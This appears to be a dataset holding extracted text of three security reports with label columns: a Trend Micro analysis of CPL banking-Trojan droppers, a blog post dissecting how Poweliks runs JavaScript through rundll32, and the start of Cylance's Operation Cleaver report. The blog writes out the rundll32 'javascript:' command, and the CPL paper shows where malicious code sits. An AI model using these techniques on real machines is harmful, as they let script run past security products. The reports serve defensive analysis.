load .CPL files onto computers. The following diagram provides more details: Figure 6: .CPL file loading process in Windows Double-clicking a .CPL file can also be simulated by issuing the following command: rundll32.exe shell32.dll,Control_RunDLL file.cpl The Control_RunDLL function has the following parameters: \xe2\x80\xa2 .CPL file name \xe2\x80\xa2 Applet index \xe2\x80\xa2 Applet tab index The structure above was created with a nonmalicious mindset because a CPL malware does not need more than one applet or multitabbed applets to work. Once the application is launched, the malware can then execute the malicious code. Before prompting the CPL applet index to launch, the CPlApplet function is called. This function has the following prototype: LONG CPlApplet( HWND hwndCPl, UINT uMsg, LPARAM lParam1, LPARAM lParam2 ); Trend Micro | CPL Malware 7 Note that the uMsg parameter is used to send valid messages like the following to the CPlApplet function that will subsequently handle them: \xe2\x80\xa2 CPL_INIT \xe2\x80\xa2 CPL_GETCOUNT \xe2\x80\xa2 CPL_INQUIRE \xe2\x80\xa2 CPL_SELECT \xe2\x80\xa2 CPL_DBLCLK \xe2\x80\xa2 CPL_STOP \xe2\x80\xa2 CPL_EXIT \xe2\x80\xa2 CPL_NEWINQUIRE \xe2\x80\xa2 CPL_STARTWPARMS The first message sent to CPlApplet function is CPL_INIT. Once sent, a code inside the .CPL file runs and must return a nonzero value to the callee to indicate successful initialization. All malicious code can be found inside the CPlApplet function. The application no longer needs to continue the normal launch process and wait for different messages. A nonmalicious CPlApplet function such as the following should handle every message: int CPlApplet(HWND hwndCPL, UINT message, LPARAM lParam1, LPARAM lParam2) { switch (message) { case CPL_INIT: // run code; return 1; case CPL_GETCOUNT: return 3; // 3 applets case CPL_INQUIRE: \xe2\x80\xa6 default: return 0; } return 0; } Malicious code, meanwhile, can look like the following: int CPlApplet(HWND hwndCPL, UINT message, LPARAM lParam1, LPARAM lParam2) { // run malware code or drop another malware return 1; } The code above is programatically valid. It appears to ignore all of the parameters received and runs the malicious part. A security analyst should understand all of the concepts above to properly analyze a malicious .CPL file. Trend Micro | CPL Malware 8 Malware do not need to wait for a CPlApplet call because a .CPL file is a DLL. Its DllMain function will be called first by the LoadLibrary function so the following is also possible: BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { // malicious code return 0; } Some packed CPL malware also use code in DllMain to unpack themselves. Analyzing .CPL Files Static Analysis A .CPL file is a .DLL file so the PE32/PE32+ format specification will also work. To identify a .CPL file, look at its extension even if it looks untrustworthy since it is merely part of the file name and may not reflect the real file type. Without the .CPL extension, the file will not load when double-clicked. General .PE file analyzers or editors should work well with .CPL files as long as they are not packed, encrypted, or use anti-reverse-engineering techniques. Some .CPL files\xe2\x80\x99 CPlApplet function can, for instance, not be properly exported until the file is loaded and unpacked in memory, in case of packed files. The static analysis should be similar to a regular .PE file analysis so sections with strange characteristics can be checked, file entropy can be calculated, and so forth. It is uncommon to see a packed or encrypted nonmalicious .CPL file. Figure 7: Exported functions of a nonmalicious joy.cpl file shipped with Windows 7 Trend Micro | CPL Malware 9 Dynamic Analysis Although it can be a little bit tricky, it is possible to debug rundll32.exe when calling the shell32.dll,Control_RunDLL to analyze the code inside a .CPL file. To assist in this effort, we created a CPL loader with the following options: Usage: cpload [-m MESSAGE] If -m is present, MESSAGE should be: Option Message ------------------------- init CPL_INIT getcount CPL_GETCOUNT inquire CPL_INQUIRE select CPL_SELECT dblclk CPL_DBLCLK stop CPL_STOP exit CPL_EXIT newinquire CPL_NEWINQUIRE startwparms CPL_STARTWPARMS Otherwise, cpload will send all messages to CPlApplet() All that\xe2\x80\x99s necessary is to call the CPlApplet function of a .CPL file sample to pass a message on. Another option is to debug the control.exe process to pass the .CPL file path as an argument as follows: control.exe myfile.cpl Trend Micro | CPL Malware 10 Cpload.exe calls the LoadLibrary and CPlApplet functions. You need to set the .CPL file path as an argument and set a breakpoint in LoadLibrary ASCII and Unicode calls (i.e., BP LoadLibraryA and LoadLibraryW, respectively). The following is an example that uses the OllyDbg Command Bar plug-in. Figure 8: Argument set as the .CPL file path with a breakpoint in LoadLibraryW Trend Micro | CPL Malware 11 How Cybercriminals Use .CPL Files .CPL files are very flexible. They can be used to host any sort of application, malicious or not. Cybercriminals take advantage of this to spread different kinds of malware. However, most CPL malware, especially in Brazil, appear to be banking Trojan droppers. Figure 9: Banking Trojan file types in Brazil, March\xe2\x80\x92November 2013 Trend Micro analyzed and now detects more than 4 million different malicious .CPL files via the Trend Micro\xe2\x84\xa2 Smart Protection Network\xe2\x84\xa2 infrastructure. Note the following interesting data on CPL malware from 2011 to 2013. Brazil \xe2\x80\xa2 First generic CPL malware detection: May 1, 2011 \xe2\x80\xa2 First CPL malware family identified: TROJ_SEFNIT6 \xe2\x80\xa2 First TROJ_BANLOAD sample identified: August 18, 2011 6 Trend Micro Incorporated. (2013). Threat Encyclopedia. \xe2\x80\x9cTROJ_SEFNIT.\xe2\x80\x9d Last accessed January 13, 2014, http://about-threats. trendmicro.com/Search.aspx?language=au&p=TROJ_SEFNIT. http://about-threats.trendmicro.com/Search.aspx?language=au&p=TROJ_SEFNIT http://about-threats.trendmicro.com/Search.aspx?language=au&p=TROJ_SEFNIT Trend Micro | CPL Malware 12 Figure 10: Number of CPL malware detections in Brazil from 2011 to 2013 Figure 11: CPL malware family distribution, excluding generic detections, in Brazil from 2011 to 2013 Trend Micro | CPL Malware 13 Worldwide \xe2\x80\xa2 First generic CPL malware detection: May 1, 2011 in Japan \xe2\x80\xa2 First CPL malware family identified: TROJ_KAZY in the U.S.7 \xe2\x80\xa2 Total number of CPL malware detections, including generic ones, from 2011 to 2013: 20,697,046 \xe2\x80\xa2 Number of CPL malware detections, excluding generic ones, from 2011 to 2013: 12,410,977 Figure 12: Number of CPL malware detections worldwide from 2011 to 2013 In one case, a file named \xe2\x80\x9cCobran\xc3\xa7a.cpl,\xe2\x80\x9d detected as TROJ_BANLOAD.KMZ, was downloaded onto computers after a link embedded in an email was clicked.8 The code inside the .CPL file dropped a file named \xe2\x80\x9ctaskhost.exe,\xe2\x80\x9d detected as TSPY_BANKER.WAV.9 This malware was then added to the Windows auto-start process and opened the Microsoft site. The next time an infected computer is rebooted, the banking Trojan is also executed. 7 Trend Micro Incorporated. (2013). Threat Encyclopedia. \xe2\x80\x9cTROJ_KAZY.\xe2\x80\x9d Last accessed January 13, 2014, http://about-threats. trendmicro.com/Search.aspx?language=au&p=TROJ_KAZY. 8 Trend Micro Incorporated. (2013). Threat Encyclopedia. \xe2\x80\x9cTROJ_BANLOAD.KMZ.\xe2\x80\x9d Last accessed January 13, 2014, http://about- threats.trendmicro.com/malware.aspx?language=au&name=TROJ_BANLOAD.KMZ. 9 Trend Micro Incorporated. (2013). Threat Encyclopedia. \xe2\x80\x9cTSPY_BANKER.WAV.\xe2\x80\x9d Last accessed January 13, 2014, http://about- threats.trendmicro.com/malware.aspx?language=au&name=TSPY_BANKER.WAV. http://about-threats.trendmicro.com/Search.aspx?language=au&p=TROJ_KAZY http://about-threats.trendmicro.com/Search.aspx?language=au&p=TROJ_KAZY http://about-threats.trendmicro.com/malware.aspx?language=au&name=TROJ_BANLOAD.KMZ http://about-threats.trendmicro.com/malware.aspx?language=au&name=TROJ_BANLOAD.KMZ http://about-threats.trendmicro.com/malware.aspx?language=au&name=TSPY_BANKER.WAV http://about-threats.trendmicro.com/malware.aspx?language=au&name=TSPY_BANKER.WAV Trend Micro | CPL Malware 14 Conclusion We have seen some malware outbreaks featuring .SCR, .VBS, and other file types in Brazil before. Right now, we are seeing a CPL malware outbreak in the country. As with any other type of malware, CPL Trojan infections can be prevented. Note the following .CPL file characteristics: \xe2\x80\xa2 .CPL files do not commonly spread throughout networks. \xe2\x80\xa2 Apart from Windows applications, some driver vendors also send .CPL files to get their applets onto the Windows Control Panel. \xe2\x80\xa2 The majority of malicious .CPL files that originated from Brazil appear to have been written using the Delphi programming language. \xe2\x80\xa2 CPL malware are mainly distributed compressed using the ZIP or RAR algorithm. These compressed files, however, normally only contain malicious .CPL files. Note though that they can be packed or encrypted when distributed. As shown, the situation is critical because the current number of malicious .CPL files is large and continues to constantly increase. Cybercriminals can do everything with .CPL files. They can be turned from droppers to rootkit installers. .CPL is, therefore, a flexible and reliable executable file format that we should worry about. Appendix OSs That Support .CPL File Execution \xe2\x80\xa2 Windows 2012 \xe2\x80\xa2 Windows 8 \xe2\x80\xa2 Windows 2008 \xe2\x80\xa2 Windows 7 \xe2\x80\xa2 Windows 2003 \xe2\x80\xa2 Windows Vista\xc2\xae \xe2\x80\xa2 Windows CE \xe2\x80\xa2 Windows 2000 \xe2\x80\xa2 Windows XP \xe2\x80\xa2 Windows ME \xe2\x80\xa2 Windows 98\xc2\xae \xe2\x80\xa2 Windows NT \xe2\x80\xa2 Windows 95\xc2\xae \xe2\x80\xa2 Windows 3.11 \xe2\x80\xa2 Windows 3.1 Trend Micro | CPL Malware 15 Top 20 Words Associated with CPL Banking Trojans 1. pdf 2. boleto (billet) 3. comprovante (receipt) 4. fiscal 5. nf (invoice) 6. nfe (electronic invoice) 7. nota (invoice) 8. visualizar (view) 9. dsc (commonly part of image file names like \xe2\x80\x9cDSC0001.jpg\xe2\x80\x9d) 10. eletronica (electronic) 11. anexo (attachment) 12. arqv (file) 13. fatura (bill) 14. deposito (deposit) 15. cheque (check) 16. via 17. cobranca (bill) 18. fotos (photos) 19. doc 20. comentariodevoz (voice comment) Trend Micro Incorporated, a global leader in security software, strives to make the world safe for exchanging digital information. Our innovative solutions for consumers, businesses and governments provide layered content security to protect information on mobile devices, endpoints, gateways, servers and the cloud. All of our solutions are powered by cloud-based global threat intelligence, the Trend Micro\xe2\x84\xa2 Smart Protection Network\xe2\x84\xa2, and are supported by over 1,200 threat experts around the globe. For more information, visit www.trendmicro.com. \xc2\xa92014 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners. 10101 N. De Anza Blvd. Cupertino, CA 95014 U.S. toll free: 1 +800.228.5651 Phone: 1 +408.257.1500 Fax: 1 +408.257.2003 http://www.trendmicro.com/us/index.html Introduction Attack Overview .CPL File Format .CPL Launch Process Analyzing .CPL Files Static Analysis Dynamic Analysis How Cybercriminals Use .CPL Files Brazil Worldwide Conclusion Appendix OSs That Support .CPL File Execution Top 20 Words Associated with CPL Banking Trojans","0","1","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Logo 20 Aug Poweliks \xe2\x80\x93 Command Line Confusion Posted at 16:46h in Technical Notes by Benkow_ 10 Comments Recently, hFireF0X provided a detailed walkthrough on the reverse engineering forum kernelmode.info about Win32/Poweliks malware. The particularity of this malware is that it resides in the Windows registry and uses rundll32.exe to execute JavaScript code. I found it funny that we can execute some JavaScript through Rundll32 and obviously I was not the only one. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 15.57.26 When we first saw the command line executing JavaScript, we were wondering how it worked. In this blog post, we analyze how and why JavaScript is executed when calling this simple command line: rundll32.exe javascript:""\\..\\mshtml,RunHTMLApplication "";alert(\xe2\x80\x98foo\xe2\x80\x99); Reminder about Rundll32 Rundll32 usage is documented on MSDN; it is used to call an exported function of a DLL file which can be achieved with the following command line: RUNDLL32.EXE , entrypoint is the exported function; its prototype must be: void CALLBACK EntryPoint(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow); The lpszCmdLine parameter is given the value specified on the rundll32 command line. We will try to figure out how Rundll32 is able to call the function RunHTMLApplication exported by the library mshtml.dll and how the \xe2\x80\x9cjavascript:\xe2\x80\x9d prefix is used to execute actual JavaScript code. Analysis of Rundll32 PARAMETERS One of the first things done by Rundll32 is to parse the command line in the internal function ParseCommand. This function searches for a comma (\xe2\x80\x98,\xe2\x80\x99, 0x2C) to locate the DLL name and for a space (\xe2\x80\x98 \xe2\x80\x98, 0x20) to locate the entrypoint name. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.00.23 When using our sample command line, ParseCommand returns javascript:""\\..\\mshtml as the DLL name and RunHTMLApplication as the entrypoint. In this context, the space after RunHTMLApplication delimits the \xe2\x80\x98optional arguments\xe2\x80\x99 part of the rundll32 command line: Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.01.37 DLL LOADER Rundll32 will perform several tries to load the actual DLL from the initial specification javascript:""\\..\\mshtml. The first test uses the function GetFileAttributes(\xe2\x80\x9cjavascript:\xe2\x80\x9d\\..\\mshtml\xe2\x80\x9d). This function eventually accesses C:\\Windows\\system32\\mshtml. As this file is not found, the function returns -1. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.04.07 SearchPath is then invoked to resolve the DLL name. This function reads the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\SafeProcessSearchMode. The Microsoft definition of this key is: When the value of this REG_DWORD registry value is set to 1, SearchPath first searches the folders that are specified in the system path, and then searches the current working folder. When the value of this registry value is set to 0, the computer first searches the current working folder, and then searches the folders that are specified in the system path. The system default value for this registry key is 0. By default this registry key doesn\xe2\x80\x99t exist (on Windows XP / 7 / 8) so SearchPath tries to load the file mshtml in the current directory of rundll32 (c:\\windows\\system32) prior to trying locating it in the system path. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.05.45 All these attempts fail and rundll32 moves to the next step. GetFileAttributes is called again searching for the manifest for the module: javascript:\xe2\x80\x9d\\..\\mshtml.manifest Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.07.09 Since all the previous steps failed, Rundll32 eventually calls LoadLibrary(""javascript:""\\..\\mshtml""). LoadLibrary is just a thin wrapper around LdrLoadDll located in ntdll.dll. Internally, LdrLoadDll adds the default extension .dll and parses the resulting string javascript:\xe2\x80\x9d\\..\\mshtml.dll as a path. The token .. instructs to go one folder up: it resolves to mshtml.dll (think of foo\\..\\mshtml.dll resolved as mshtml.dll). With mshtml.dll specification, LdrLoadDll is able to load the library in the system directory. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.09.02 Rundll32 then calls GetProcAddress with the previously extracted entry point name RunHTMLApplication. For the moment, the javascript: prefix seems pretty useless: LoadLibrary(""foobar:\\""\\..\\mshtml"") works fine. So, why prefixing with javascript:? PROTOCOLS HANDLER Once the entry point address has been resolved, Rundll32 calls the function mshtml.dll!RunHTMLApplication. Even if not documented, the actual RunHTMLApplication can be inferred from the call made by c:\\windows\\system32\\mshta.exe (the application dedicated to launch an .hta file): HRESULT RunHTMLApplication( HINSTANCE hinst, HINSTANCE hPrevInst, LPSTR szCmdLine, int nCmdShow ); This is not far from the function prototype expected for a rundll32 entry point: void CALLBACK EntryPoint( HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow ); RunHTMLApplication receives a handle to a window instead of a handle to a module as the first parameter. This parameter is used when mshml registers for a window class and creates a window of this new class. Passing a value not corresponding to an actual instance doesn\xe2\x80\x99t seem to disturb user32 very much\xe2\x80\xa6 The second parameter is not used at all, so the mismatch is not important. The last parameter, nCmdShow, is used by the RunHTMLApplication function to display the window hosting the HTML application. Rundll32 always calls the entry point function with the value SW_SHOWDEFAULT to instruct any potential opened window to use window default placement. The main parameter of interest would be lpszCmdLine ("";alert('foo')) in our case. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.16.36 This obviously leads to an issue since this is not a valid JavaScript statement (please note the missing double-quote at the end of the statement). But it works anyway, because RunHTMLApplication ignores the given parameter and prefers to request again the original command line from the GetCommandLine Windows API (wrapped in a call to the GetCmdLine function). Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.20.09 The full command line contains the name of the executable and the parameters: GetCmdLine extracts the parameters by cleaning up the executable specification: Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.23.29 After that, RunHTMLApplication calls CreateUrlMoniker: Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.25.04 This is where the string \xc2\xab javascript: \xc2\xbb is essential. CreateUrlMoniker parses the command line to extract the string before the char \xe2\x80\x9c:\xe2\x80\x9d (0x3A): \xe2\x80\x9cjavascript\xe2\x80\x9d. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.28.27 CreateUrlMoniker crawls the registry key HKCR\\SOFTWARE\\Classes\\PROTOCOLS\\Handler\\. These keys refer to a set of protocols and their CLSID. CreateUrlMoniker finds an appropriate protocol handler for the JavaScript protocol (HKCR\\SOFTWARE\\Classes\\PROTOCOLS\\Handler\\javascript): Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.29.55 The CLSID {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} matches \xc2\xab Microsoft HTML Javascript Pluggable Protocol \xc2\xbb. Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.31.51 It is for this reason that the string \xe2\x80\x9cjavascript\xe2\x80\x9d is essential in the beginning of the parameters. The same mechanism comes into play when one types javascript:alert(\xe2\x80\x98foo\xe2\x80\x99); in the Internet Explorer navigation bar: Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.34.18 The remaining of the string located after the \xe2\x80\x98:\xe2\x80\x99 separator is interpreted by the JavaScript URL moniker as JavaScript instructions: ""\\..\\mshtml,RunHTMLApplication "";alert(\xe2\x80\x98foo\xe2\x80\x99); This is a valid JavaScript with a string ""\\..\\mshtml,RunHTMLApplication "" (hence the double-quotes skipped in all the previous steps!) and a function (alert). Finally RunHTMLApplication calls CHTMLApp::Run and the JavaScript is executed: Capture d\xe2\x80\x99\xc3\xa9cran 2014-08-20 \xc3 16.35.36 Security point From a security point of view, executing JavaScript through Rundll32 is like executing an HTML Application. In other words, we can have all the power of Internet Explorer\xe2\x80\x94its object model, performance, rendering power and protocol support\xe2\x80\x94without enforcing the strict security model and user interface of the browser. Zone security is off, and cross-domain script access is allowed, we have read/write access to the files and system registry on the client machine. With this trick, JavaScript is executed outside the Internet Explorer process and script is not subject to security concept like Protected Mode / Sandbox on Vista and superior. Conclusion RunHTMLApplication has the perfect prototype to work with Rundll32. Attackers have made great efforts to build a command line using the perfect syntax for passing through all the mechanisms (library loading, command line parsing, URL syntax correctness, valid JavaScript, etc.) leading to JavaScript execution in an uncontrolled environment. From our understanding, this technique allows bypassing some security products that may trust actions performed by the built-in rundll32 while specifying the script to run without writing any file on the file system. That\xe2\x80\x99s all folks! Tags: MALWARE POWELIKS WIN32 Share Print page1 Like Benoit Ancel Benoit.Ancel@Stormshield.Eu 10 Comments Mark Beihoffer Posted at 22:48h, 02 September REPLY I think I\xe2\x80\x99m going to have to go lie down after reading *this*. Every day I thank my lucky stars I am no longer a Windows systems administrator. I may have to inform some of my friends about the insightful comments you\xe2\x80\x99ve made here. They make future network architecture purchasing decisions & I do believe that their next round of investments will focus primarily on BSD systems, possibly augmented by Debian or Ubuntu machines. Thanks so much for your research. mbeihoffer Posted at 23:05h, 02 September REPLY Thanks for sharing this. I have to alert my friends about this, so they don\xe2\x80\x99t keep buying all these copies of Microsoft Windows Advanced Data Center Edition 768-core licenses. I mean, the first few times they cashed out our pension fund & laid off a third of the I.T. department, it was funny. But then spending all that pension money on some sort of weird Windows cluster running on a subterranean blade server farm, plus their propensity to spend a lot of time & money buying 32-core Oracle licenses, so it at least would *look* like they are busy doing something, well. After I left the industry I decided to take some time off. I don\xe2\x80\x99t have to maintain Windows systems any more in my new position, & even though I\xe2\x80\x99m not making the kind of money I did when I was a network architect, well. Articles like this one no longer give me heart palpitations & panic attacks, so that\xe2\x80\x99s a plus. On the other hand, I\xe2\x80\x99m continually surprised at how many friends & acquaintances I have that, although most of them are eager to switch to Mac OS X or Apple iOS devices, or in some cases, even seem excited about Ubuntu Linux & Debian GNU/Linux. It\xe2\x80\x99s just a really, really slow process. Anyway, thanks so much for the enlightening research & helpful article. It got me to thinking; maybe I should pick up one of my friend\xe2\x80\x99s $25.00 special, refurbished Windows 7 systems, complete with flat panel monitor & what-have-you. It would be fun to put it behind a transparent bridging OpenBSD firewall, & take advantage of _tcpdump_ & ettercap, pf, & so forth. Basically, I would be sacrificing the Windows machine by connecting it to the Internet, but since I\xe2\x80\x99d be able to sniff the network traffic & analyze the various infectious agents as they worked their way into the new machine. Sort of\xe2\x80\xa6 like an aquarium, for worms, viruses, backdoors, rootkits, dll injection attacks, privilege escalation attacks, & so forth. It would be the only Windows machine on the network, which is actually pretty comforting at this point, but I bet the various autonomous agents & R.A.T. ops would at least give me a little bit of entertainment as I futz with it. I always thought the best rootkits were developed in ObjectiveCaml, asm, & good old C, but I guess if rundll.32 & so forth are in to JavaScript now, well. Who am I to judge. Anyway, it\xe2\x80\x99s been fun reading your site, but I\xe2\x80\x99ve got to run now & see how my new GitHub repository is doing. Johnd61 Posted at 13:15h, 12 October REPLY Just wanna input on few general things, The website pattern is perfect, the subject material is real excellent. Believe those who are seeking the truth. Doubt those who find it. by Andre Gide. kegeedkkgdkc Pingback:\xe5\x88\x86\xe4\xba\xab\xe4\xb8\x80\xe4\xba\x9b\xe4\xb8\x8d\xe9\x94\x99\xe5\x9b\xbd\xe5\xa4\x96\xe6\x8a\x80\xe6\x9c\xaf\xe6\x96\x87\xe7\xab | \xe5\xae\x89\xe5 \xa8\xe7\x9b\x92\xe5\xad\x90 Posted at 11:23h, 29 December REPLY [\xe2\x80\xa6] poweliks command line confusion LINK [\xe2\x80\xa6] Pingback:JavaScript\xe5\x90\x8e\xe9\x97\xa8\xe6\xb7\xb1\xe5\xb1\x82\xe5\x88\x86\xe6\x9e\x90 | z7y Blog Posted at 05:00h, 12 January REPLY [\xe2\x80\xa6] links: http://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ [\xe2\x80\xa6] Pingback:JavaScript\xe5\x90\x8e\xe9\x97\xa8\xe6\xb7\xb1\xe5\xb1\x82\xe5\x88\x86\xe6\x9e\x90 | D \xe2\x80\x99 blog Posted at 00:32h, 16 January REPLY [\xe2\x80\xa6] links: http://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ [\xe2\x80\xa6] Pingback:Being Infected with Fileless Malware | . . TheSecurityBlogger . . . Posted at 18:18h, 27 May REPLY [\xe2\x80\xa6] loaded is actually javascript; this behavior is well documented for Poweliks such as in the article Poweliks \xe2\x80\x93 Command Line Confusion. Notice the activity following the LdrLoadDll function call is trying to locate the address for the [\xe2\x80\xa6] Pingback:\xe6\x8f\xad\xe7\xa7\x98\xe5\x9f\xba\xe4\xba\x8e\xe6\xb3\xa8\xe5\x86\x8c\xe8\xa1\xa8\xe9\x9a\x90\xe8\x97\x8f\xe7\x9a\x84\xe6\x97 \xe6\x96\x87\xe4\xbb\xb6\xe6\x94\xbb\xe5\x87\xbb | \xe5\xae\x89\xe5 \xa8\xe7\x9b\x92\xe5\xad\x90 Posted at 12:38h, 07 July REPLY [\xe2\x80\xa6] [1]https://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ [\xe2\x80\xa6] Pingback:\xe6\x8f\xad\xe7\xa7\x98\xe5\x9f\xba\xe4\xba\x8e\xe6\xb3\xa8\xe5\x86\x8c\xe8\xa1\xa8\xe9\x9a\x90\xe8\x97\x8f\xe7\x9a\x84\xe6\x97 \xe6\x96\x87\xe4\xbb\xb6\xe6\x94\xbb\xe5\x87\xbb | \xe7\xba\xa2\xe8\x89\xb2\xe6\x88\x98\xe7\xba\xbf Posted at 06:03h, 11 July REPLY [\xe2\x80\xa6] [1]https://thisissecurity.net/2014/08/20/poweliks-command-line-confusion/ [\xe2\x80\xa6] mywebsite Posted at 17:02h, 03 February REPLY I got this site from my friend who informed me about this site and now this time I am browsing this web site and reading very informative posts at this time. Post A Comment Write your comment here... Your full name E-mail address Website Save my name, email, and website in this browser for the next time I comment. This site uses Akismet to reduce spam. Learn how your comment data is processed. Read more THISISSECURITY In-depth Formbook malware analysis \xe2\x80\x93 Obfuscation and process injection 29 MARCH, 2018 | BY R\xc3\x89MI JULLIAN THISISSECURITY De-obfuscating Jump Chains with Binary Ninja 20 MARCH, 2018 | BY MEHDI TALBI THISISSECURITY Spot the Agent 02 MARCH, 2018 | BY COLDSHELL logo stormshield.comLegal Notice We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.Ok","0","1","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 #OPCLEAVER 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 OPERATION CLEAVER 2 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2 0476f6f64 \xe2\x80\x9cIran should be considered a first-tier cyber power.\xe2\x80\x9d Gabi Siboni Israel Institute for National Security Studies cybersecurity expert \xe2\x80\x9cIran has rapidly gained near parity with the Chinese but may be closer to the Russians in terms of swagger.\xe2\x80\x9d Retired Admiral William J. Fallon Former Commander CENTCOM \xe2\x80\x9cGlobal critical infrastructure organizations need to take this threat seriously. The Iranian adversary is real and they\xe2\x80\x99re coming, if not already here.\xe2\x80\x9d Mark Weatherford Former Deputy Under Secretary for Cybersecurity at the US Department of Homeland Security \xe2\x80\x9cYes, China and one or two others can shut down our power grids.\xe2\x80\x9d Admiral Michael Rogers Director of the National Security Agency and head of US Cyber Command \xe2\x80\x9cThe world has combated cyber threats by doing the same thing over and over again \xe2\x80\xa6 It\xe2\x80\x99s the definition of insanity.\xe2\x80\x9d Jeff Moss Co-Chair DHS Community Resiliency Task Force, Founder of DEFCON and BlackHat Jalal ad-Din Muhammad Rumi 13th Century Persian poet, jurist, theologian and Sufi mystic English translation: \xe2\x80\x9cSilence gives answers.\xe2\x80\x9d #OPCLEAVER 3 546 86 96 e6 b2 04 57 66 96 c2 c2 04 46f2ff 0476 f6f 4 PREVENTION IS EVERYTHING A personal note from Cylance, CEO Stuart McClure On February 24, 1989, United Flight 811 left Honolulu, Hawaii, on its way to Auckland, New Zealand, with 364 souls on board. Somewhere between 23,000 and 24,000 feet an enormous explosion ejected nine passengers into the dark void over the Pacific Ocean.1 This aviation disaster was later determined to have been caused by a simple design flaw combined with the lack of corrective action. Boeing and the FAA had known about this problem for over one year prior to the accident. The result: nine people lost their lives. The other 337 passengers plus 18 crew members who survived, live with the memory every day; all of it due to a highly preventable design flaw. As a 19-year-old young adult, I was grateful to have survived but I had no idea how that single event would impact my future in such a profound way. Much of my passion for cybersecurity can be directly attributed to that fateful day. The United Flight 811 accident proves just how important it is to detect flaws before tragedy strikes. Preventable disasters like this are what motivates the Cylance team to create a safer world. We do everything we can to uncover the flaws in technologies before they damage the physical or cyber world. Our mission is simple: to protect the world. This report is an attempt to deliver on that mission. After tracking hackers both personally and professionally for more than 26 years, there is no doubt in my mind that the release of the information contained in the Operation Cleaver report is vital to the security of the world\xe2\x80\x99s critical infrastructure. The focus of the Operation Cleaver report is on one particular Iranian team we\xe2\x80\x99ve dubbed Tarh Andishan, the infrastructure they utilize, as well as their tactics, techniques and procedures. Roughly translated, \xe2\x80\x9cTarh Andishan\xe2\x80\x9d means \xe2\x80\x9cthinkers\xe2\x80\x9d or \xe2\x80\x9cinnovators\xe2\x80\x9d. This team displays an evolved skillset and uses a complex infrastructure to perform attacks of espionage, theft, and the potential destruction of control systems and networks. While our investigation is ongoing, and we presently have limited visibility inside many of the compromised networks, Cylance observed Tarh Andishan actively targeting, attacking, and compromising more than 50 victims since at least 2012. Cylance is committed to responsible disclosure and has refrained from exaggeration and embellishment in this report, limiting our content to only that which can be definitively confirmed. However, we have speculated on the possible motivations behind these attacks, given our deep knowledge and understanding of the cyber landscape. We have made every effort to notify all affected entities prior to publishing this report. Additionally, all personally identifiable information about the members of Operation Cleaver has been withheld. We don\xe2\x80\x99t care who the adversary is, where they work or reside, who they\xe2\x80\x99re dating or what party photos they upload to Facebook \xe2\x80\x93 all we care about is preventing campaigns like Operation Cleaver from negatively affecting the real world. This report is for the world\xe2\x80\x99s cyber defenders \xe2\x80\x93 never give up! Sincerely, Stuart McClure CEO/President Cylance, Inc. OPERATION CLEAVER 4 546 86 